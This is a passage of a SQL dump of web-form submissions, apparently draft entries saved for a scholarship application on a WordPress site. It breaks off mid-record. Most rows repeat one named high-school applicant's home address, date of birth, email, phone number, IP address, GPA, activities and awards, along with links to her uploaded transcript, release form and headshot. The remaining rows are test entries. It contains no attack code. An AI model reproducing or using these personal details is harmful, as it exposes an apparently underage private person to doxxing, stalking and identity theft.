practices\",\"13\":\"\",\"36\":\"\",\"37\":\"\",\"16\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"\",\"22\":\"\",\"33\":\"\",\"32\":\"\",\"34\":\"\",\"42\":null},\"partial_entry\":{\"id\":null,\"post_id\":null,\"date_created\":null,\"form_id\":6,\"ip\":\"72.81.137.185\",\"source_url\":\"https:\\/\\/zphiblgz.org\\/scholarship\\/application\\/\",\"user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\",\"created_by\":\"NULL\",\"currency\":\"USD\",\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\",\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med \",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  - \\r\\nExecutive Vice President   June 2019- Present\\r\\nOfficer at Large                      June 2018 - June 2019\\r\\nGeneral Member                    September 2016 - June 2018 \\r\\n\\r\\nAssist CEO\\u2019s with all duties assigned to them\\r\\nPlan and organize workshops \\r\\nMentor underclassman in events\\r\\n\\r\\n-River Hill POMS  - Team Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n                                          \\r\\nLead to win State Championship\\r\\nCreates 3 pieces of choreography per month\\r\\nLead practices \",\"13\":\"\",\"36\":\"\",\"37\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Unofficialtranscript.pdf\",\"33\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/ReleaseForm.pdf\",\"34\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Ireheadpic.pdf\"},\"field_values\":\"\",\"page_number\":\"1\",\"files\":[],\"gform_unique_id\":\"5e8167a8a6904\"}'),('f491fafa75fd43bc8634ed305a165794',NULL,6,'2020-03-30 03:36:56','72.81.137.185','https://zphiblgz.org/scholarship/application/','{\"submitted_values\":{\"3\":\"\",\"18\":{\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\"},\"19\":{\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"19_copy_values_activated\":false},\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"8\":\"\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med\",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  \\r\\n Executive Vice President   June 2019- Present\\r\\n Officer at Large                      June 2018 - June 2019\\r\\n General Member                    September 2016 - June 2018 \\r\\n\\r\\n-River Hill POMS  \\r\\nTeam Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n\\r\\n-Black Leadership Union \\r\\nPresident  September 2019 - Present\\r\\nHistorian   September 2018 - June 2019\\r\\nGeneral Member September 2016- June 2018\\r\\n\\r\\n-National Honor Society \\r\\nMember November 2018 - Present\\r\\n\\r\\n-Delta Scholars \\r\\nVice President  September 2019 - Present\\r\\n BLU Liaison         September 2018- June 2019\\r\\n General Member September 2017- June 2018\\r\\n\\r\\n-Class of 2020 Student Government Association \\r\\nVice President  June 2017- Present\\r\\n\\r\\n-Leadership, Education, and Development (LEAD) Program \\r\\n Participant                            July 2019\\r\\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\\r\\nStrengthened and developed communication skills within a diverse group of students \\r\\n\\r\\n-Kindred Hair and Skin Center \\r\\n Internship\\t\\t\\t  September 2018 - Present\\r\\nShadow board certified dermatologist  in appointments and various dermatology procedures\\r\\nOrganize and complete paperwork \\r\\n\\r\\n-Maryland Leadership Workshop \\r\\nAdvanced Leadership Workshop, University of Maryland, Baltimore County \\t                                   July 2018\\r\\nSenior High Camp, Washington College\\t\\t\\t\\t\\t                                   July 2017\\r\\nNetworked and partnered with students across Maryland to analyze real life scenarios\\/problems and develop probable solutions\\r\\n\\r\\n-Junior Achievement Rising Woman \\r\\nVP of Supply Chain\\t            September 2017 - January 2018\\r\\nWorked as part of a team to build a company and product\\r\\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers\",\"13\":\"\",\"36\":\"\",\"37\":\"\",\"16\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"\",\"22\":\"\",\"33\":\"\",\"32\":\"\",\"34\":\"\",\"42\":null},\"partial_entry\":{\"id\":null,\"post_id\":null,\"date_created\":null,\"form_id\":6,\"ip\":\"72.81.137.185\",\"source_url\":\"https:\\/\\/zphiblgz.org\\/scholarship\\/application\\/\",\"user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\",\"created_by\":\"NULL\",\"currency\":\"USD\",\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\",\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med \",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  \\r\\n Executive Vice President   June 2019- Present\\r\\n Officer at Large                      June 2018 - June 2019\\r\\n General Member                    September 2016 - June 2018 \\r\\n\\r\\n-River Hill POMS  \\r\\nTeam Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n\\r\\n-Black Leadership Union \\r\\nPresident  September 2019 - Present\\r\\nHistorian   September 2018 - June 2019\\r\\nGeneral Member September 2016- June 2018\\r\\n\\r\\n-National Honor Society \\r\\nMember November 2018 - Present\\r\\n\\r\\n-Delta Scholars \\r\\nVice President  September 2019 - Present\\r\\n BLU Liaison         September 2018- June 2019\\r\\n General Member September 2017- June 2018\\r\\n\\r\\n-Class of 2020 Student Government Association \\r\\nVice President  June 2017- Present\\r\\n\\r\\n-Leadership, Education, and Development (LEAD) Program \\r\\n Participant                            July 2019\\r\\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\\r\\nStrengthened and developed communication skills within a diverse group of students \\r\\n\\r\\n-Kindred Hair and Skin Center \\r\\n Internship\\t\\t\\t  September 2018 - Present\\r\\nShadow board certified dermatologist  in appointments and various dermatology procedures\\r\\nOrganize and complete paperwork \\r\\n\\r\\n-Maryland Leadership Workshop \\r\\nAdvanced Leadership Workshop, University of Maryland, Baltimore County \\t                                   July 2018\\r\\nSenior High Camp, Washington College\\t\\t\\t\\t\\t                                   July 2017\\r\\nNetworked and partnered with students across Maryland to analyze real life scenarios\\/problems and develop probable solutions\\r\\n\\r\\n-Junior Achievement Rising Woman \\r\\nVP of Supply Chain\\t            September 2017 - January 2018\\r\\nWorked as part of a team to build a company and product\\r\\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers\\r\\n\\r\\n\\r\\n\\r\\n\",\"13\":\"\",\"36\":\"\",\"37\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Unofficialtranscript.pdf\",\"33\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/ReleaseForm.pdf\",\"34\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Ireheadpic.pdf\"},\"field_values\":\"\",\"page_number\":\"1\",\"files\":[],\"gform_unique_id\":\"5e816958d5f22\"}'),('4f00893993e54a40babc4252fe90362f',NULL,6,'2020-03-30 03:37:27','72.81.137.185','https://zphiblgz.org/scholarship/application/','{\"submitted_values\":{\"3\":\"\",\"18\":{\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\"},\"19\":{\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"19_copy_values_activated\":false},\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"8\":\"\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med\",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  \\r\\n Executive Vice President   June 2019- Present\\r\\n Officer at Large                      June 2018 - June 2019\\r\\n General Member                    September 2016 - June 2018 \\r\\n\\r\\n-River Hill POMS  \\r\\nTeam Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n\\r\\n-Black Leadership Union \\r\\nPresident  September 2019 - Present\\r\\nHistorian   September 2018 - June 2019\\r\\nGeneral Member September 2016- June 2018\\r\\n\\r\\n-National Honor Society \\r\\nMember November 2018 - Present\\r\\n\\r\\n-Delta Scholars \\r\\nVice President  September 2019 - Present\\r\\n BLU Liaison         September 2018- June 2019\\r\\n General Member September 2017- June 2018\\r\\n\\r\\n-Class of 2020 Student Government Association \\r\\nVice President  June 2017- Present\\r\\n\\r\\n-Leadership, Education, and Development (LEAD) Program \\r\\n Participant                            July 2019\\r\\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\\r\\nStrengthened and developed communication skills within a diverse group of students \\r\\n\\r\\n-Kindred Hair and Skin Center \\r\\n Internship\\t\\t\\t  September 2018 - Present\\r\\nShadow board certified dermatologist  in appointments and various dermatology procedures\\r\\nOrganize and complete paperwork \\r\\n\\r\\n-Maryland Leadership Workshop \\r\\nAdvanced Leadership Workshop, University of Maryland, Baltimore County \\t                                   July 2018\\r\\nSenior High Camp, Washington College\\t\\t\\t\\t\\t                                   July 2017\\r\\nNetworked and partnered with students across Maryland to analyze real life scenarios\\/problems and develop probable solutions\\r\\n\\r\\n-Junior Achievement Rising Woman \\r\\nVP of Supply Chain\\t            September 2017 - January 2018\\r\\nWorked as part of a team to build a company and product\\r\\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers\",\"13\":\"Senior Dance Company Outstanding Achievement Award                    [ June 2017, June 2018, June 2019]\\r\\nMid Atlantic Poms & Dance Association State Championship|1st place Team  [March 2017, March 2019]\\r\\nFuture Business Leaders of America State Conference|4th place Business Plan\\/Presentation     [March 2019]\\r\\nDistributive Education Clubs of America State Conference|2nd place Role Play                [February 2019]\\r\\nAcademic Achievement Award| English Honors, Biology GT                                       [ June 2017, June 2018]\\r\\nFuture Business Leaders of America State Conference|2nd place Presentation                       [ March  2018]\\r\\nFuture Business Leaders of America Regional Conference|1st place Presentation                [ January 2018]\",\"36\":\"\",\"37\":\"\",\"16\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"\",\"22\":\"\",\"33\":\"\",\"32\":\"\",\"34\":\"\",\"42\":null},\"partial_entry\":{\"id\":null,\"post_id\":null,\"date_created\":null,\"form_id\":6,\"ip\":\"72.81.137.185\",\"source_url\":\"https:\\/\\/zphiblgz.org\\/scholarship\\/application\\/\",\"user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\",\"created_by\":\"NULL\",\"currency\":\"USD\",\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\",\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med \",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  \\r\\n Executive Vice President   June 2019- Present\\r\\n Officer at Large                      June 2018 - June 2019\\r\\n General Member                    September 2016 - June 2018 \\r\\n\\r\\n-River Hill POMS  \\r\\nTeam Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n\\r\\n-Black Leadership Union \\r\\nPresident  September 2019 - Present\\r\\nHistorian   September 2018 - June 2019\\r\\nGeneral Member September 2016- June 2018\\r\\n\\r\\n-National Honor Society \\r\\nMember November 2018 - Present\\r\\n\\r\\n-Delta Scholars \\r\\nVice President  September 2019 - Present\\r\\n BLU Liaison         September 2018- June 2019\\r\\n General Member September 2017- June 2018\\r\\n\\r\\n-Class of 2020 Student Government Association \\r\\nVice President  June 2017- Present\\r\\n\\r\\n-Leadership, Education, and Development (LEAD) Program \\r\\n Participant                            July 2019\\r\\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\\r\\nStrengthened and developed communication skills within a diverse group of students \\r\\n\\r\\n-Kindred Hair and Skin Center \\r\\n Internship\\t\\t\\t  September 2018 - Present\\r\\nShadow board certified dermatologist  in appointments and various dermatology procedures\\r\\nOrganize and complete paperwork \\r\\n\\r\\n-Maryland Leadership Workshop \\r\\nAdvanced Leadership Workshop, University of Maryland, Baltimore County \\t                                   July 2018\\r\\nSenior High Camp, Washington College\\t\\t\\t\\t\\t                                   July 2017\\r\\nNetworked and partnered with students across Maryland to analyze real life scenarios\\/problems and develop probable solutions\\r\\n\\r\\n-Junior Achievement Rising Woman \\r\\nVP of Supply Chain\\t            September 2017 - January 2018\\r\\nWorked as part of a team to build a company and product\\r\\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers\\r\\n\\r\\n\\r\\n\\r\\n\",\"13\":\"Senior Dance Company Outstanding Achievement Award                    [ June 2017, June 2018, June 2019]\\r\\nMid Atlantic Poms & Dance Association State Championship|1st place Team  [March 2017, March 2019]\\r\\nFuture Business Leaders of America State Conference|4th place Business Plan\\/Presentation     [March 2019]\\r\\nDistributive Education Clubs of America State Conference|2nd place Role Play                [February 2019]\\r\\nAcademic Achievement Award| English Honors, Biology GT                                       [ June 2017, June 2018]\\r\\nFuture Business Leaders of America State Conference|2nd place Presentation                       [ March  2018]\\r\\nFuture Business Leaders of America Regional Conference|1st place Presentation                [ January 2018]\\r\\n\",\"36\":\"\",\"37\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Unofficialtranscript.pdf\",\"33\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/ReleaseForm.pdf\",\"34\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Ireheadpic.pdf\"},\"field_values\":\"\",\"page_number\":\"1\",\"files\":[],\"gform_unique_id\":\"5e816977a7b87\"}'),('3c33d2722dd54b52806510d60b52819e',NULL,6,'2020-03-30 03:08:34','72.81.137.185','https://zphiblgz.org/scholarship/application/','{\"submitted_values\":{\"3\":\"\",\"18\":{\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\"},\"19\":{\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"19_copy_values_activated\":false},\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"8\":\"\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med\",\"12\":\"NA\",\"14\":\"\",\"13\":\"\",\"36\":\"\",\"37\":\"\",\"16\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"\",\"22\":\"\",\"33\":\"\",\"32\":\"\",\"34\":\"\",\"42\":null},\"partial_entry\":{\"id\":null,\"post_id\":null,\"date_created\":null,\"form_id\":6,\"ip\":\"72.81.137.185\",\"source_url\":\"https:\\/\\/zphiblgz.org\\/scholarship\\/application\\/\",\"user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\",\"created_by\":\"NULL\",\"currency\":\"USD\",\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\",\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med \",\"12\":\"NA\",\"14\":\"\\r\\n\\r\\n\",\"13\":\"\",\"36\":\"\",\"37\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Unofficialtranscript.pdf\",\"33\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/ReleaseForm.pdf\",\"34\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/IreHeadshot.pdf\"},\"field_values\":\"\",\"page_number\":\"1\",\"files\":[],\"gform_unique_id\":\"5e8162b2bceb9\"}'),('2883a4e6bc2943b59cb36a0ba7aaa7a1',NULL,6,'2020-03-30 03:01:43','72.81.137.185','https://zphiblgz.org/scholarship/application/','{\"submitted_values\":{\"3\":\"\",\"18\":{\"18.2\":\"\",\"18.3\":\"Test\",\"18.4\":\"\",\"18.6\":\"Test\",\"18.8\":\"\"},\"19\":{\"19.1\":\"\",\"19.2\":\"\",\"19.3\":\"\",\"19.4\":\"\",\"19.5\":\"\",\"19.6\":\"United States\",\"19_copy_values_activated\":false},\"4\":\"\",\"21\":\"\",\"20\":\"\",\"10\":\"Atholton High School\",\"27\":\"BSAP Advisor\",\"28\":\"\",\"8\":\"\",\"9\":\"\",\"26\":\"\",\"12\":\"\",\"14\":\"\",\"13\":\"\",\"36\":\"\",\"37\":\"\",\"16\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"\",\"22\":\"\",\"33\":\"\",\"32\":\"\",\"34\":\"\",\"42\":null},\"partial_entry\":{\"id\":null,\"post_id\":null,\"date_created\":null,\"form_id\":6,\"ip\":\"72.81.137.185\",\"source_url\":\"https:\\/\\/zphiblgz.org\\/scholarship\\/application\\/\",\"user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\",\"created_by\":\"NULL\",\"currency\":\"USD\",\"18.2\":\"\",\"18.3\":\"Test\",\"18.4\":\"\",\"18.6\":\"Test\",\"18.8\":\"\",\"19.1\":\"\",\"19.2\":\"\",\"19.3\":\"\",\"19.4\":\"\",\"19.5\":\"\",\"19.6\":\"United States\",\"4\":\"\",\"21\":\"\",\"20\":\"\",\"10\":\"Atholton High School\",\"27\":\"BSAP Advisor\",\"28\":\"\",\"9\":\"\",\"26\":\"\",\"12\":\"\",\"14\":\"\",\"13\":\"\",\"36\":\"\",\"37\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Unofficialtranscript.pdf\",\"33\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/ReleaseForm.pdf\",\"34\":\"\"},\"field_values\":\"\",\"page_number\":\"1\",\"files\":[],\"gform_unique_id\":\"5e8161178b063\"}'),('8ad9c47dfcfc42b1a8c0c20677982f32',NULL,6,'2020-03-30 03:02:23','72.81.137.185','https://zphiblgz.org/scholarship/application/','{\"submitted_values\":{\"3\":\"\",\"18\":{\"18.2\":\"\",\"18.3\":\"Test\",\"18.4\":\"\",\"18.6\":\"Test\",\"18.8\":\"\"},\"19\":{\"19.1\":\"\",\"19.2\":\"\",\"19.3\":\"\",\"19.4\":\"\",\"19.5\":\"\",\"19.6\":\"United States\",\"19_copy_values_activated\":false},\"4\":\"\",\"21\":\"\",\"20\":\"\",\"10\":\"Atholton High School\",\"27\":\"BSAP Advisor\",\"28\":\"\",\"8\":\"\",\"9\":\"\",\"26\":\"\",\"12\":\"\",\"14\":\"\",\"13\":\"\",\"36\":\"\",\"37\":\"\",\"16\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"\",\"22\":\"\",\"33\":\"\",\"32\":\"\",\"34\":\"\",\"42\":null},\"partial_entry\":{\"id\":null,\"post_id\":null,\"date_created\":null,\"form_id\":6,\"ip\":\"72.81.137.185\",\"source_url\":\"https:\\/\\/zphiblgz.org\\/scholarship\\/application\\/\",\"user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\",\"created_by\":\"NULL\",\"currency\":\"USD\",\"18.2\":\"\",\"18.3\":\"Test\",\"18.4\":\"\",\"18.6\":\"Test\",\"18.8\":\"\",\"19.1\":\"\",\"19.2\":\"\",\"19.3\":\"\",\"19.4\":\"\",\"19.5\":\"\",\"19.6\":\"United States\",\"4\":\"\",\"21\":\"\",\"20\":\"\",\"10\":\"Atholton High School\",\"27\":\"BSAP Advisor\",\"28\":\"\",\"9\":\"\",\"26\":\"\",\"12\":\"\",\"14\":\"\",\"13\":\"\",\"36\":\"\",\"37\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Unofficialtranscript.pdf\",\"33\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/ReleaseForm.pdf\",\"34\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/IreHeadshot.pdf\"},\"field_values\":\"\",\"page_number\":\"1\",\"files\":[],\"gform_unique_id\":\"5e81613f65967\"}'),('8bdd683956594f0e9bf230435b7d8ada',NULL,6,'2020-03-30 03:18:31','72.81.137.185','https://zphiblgz.org/scholarship/application/','{\"submitted_values\":{\"3\":\"\",\"18\":{\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\"},\"19\":{\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"19_copy_values_activated\":false},\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"8\":\"\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med\",\"12\":\"NA\",\"14\":\"Hello\",\"13\":\"\",\"36\":\"\",\"37\":\"\",\"16\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"\",\"22\":\"\",\"33\":\"\",\"32\":\"\",\"34\":\"\",\"42\":null},\"partial_entry\":{\"id\":null,\"post_id\":null,\"date_created\":null,\"form_id\":6,\"ip\":\"72.81.137.185\",\"source_url\":\"https:\\/\\/zphiblgz.org\\/scholarship\\/application\\/\",\"user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\",\"created_by\":\"NULL\",\"currency\":\"USD\",\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\",\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med \",\"12\":\"NA\",\"14\":\"Hello\",\"13\":\"\",\"36\":\"\",\"37\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Unofficialtranscript.pdf\",\"33\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/ReleaseForm.pdf\",\"34\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/IreHeadshot.pdf\"},\"field_values\":\"\",\"page_number\":\"1\",\"files\":[],\"gform_unique_id\":\"5e81650752336\"}'),('80af191b37ce4b38819116adbde16f01',NULL,6,'2020-03-30 03:27:03','72.81.137.185','https://zphiblgz.org/scholarship/application/','{\"submitted_values\":{\"3\":\"\",\"18\":{\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\"},\"19\":{\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"19_copy_values_activated\":false},\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"8\":\"\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med\",\"12\":\"NA\",\"14\":\"Future Business Leaders of America \\r\\n\\r\\n\\r\\nAssist CEO\\u2019s with all duties assigned to them\\r\\nPlan and organize workshops \\r\\nMentor underclassman in events\",\"13\":\"\",\"36\":\"\",\"37\":\"\",\"16\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"\",\"22\":\"\",\"33\":\"\",\"32\":\"\",\"34\":\"\",\"42\":null},\"partial_entry\":{\"id\":null,\"post_id\":null,\"date_created\":null,\"form_id\":6,\"ip\":\"72.81.137.185\",\"source_url\":\"https:\\/\\/zphiblgz.org\\/scholarship\\/application\\/\",\"user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\",\"created_by\":\"NULL\",\"currency\":\"USD\",\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\",\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott 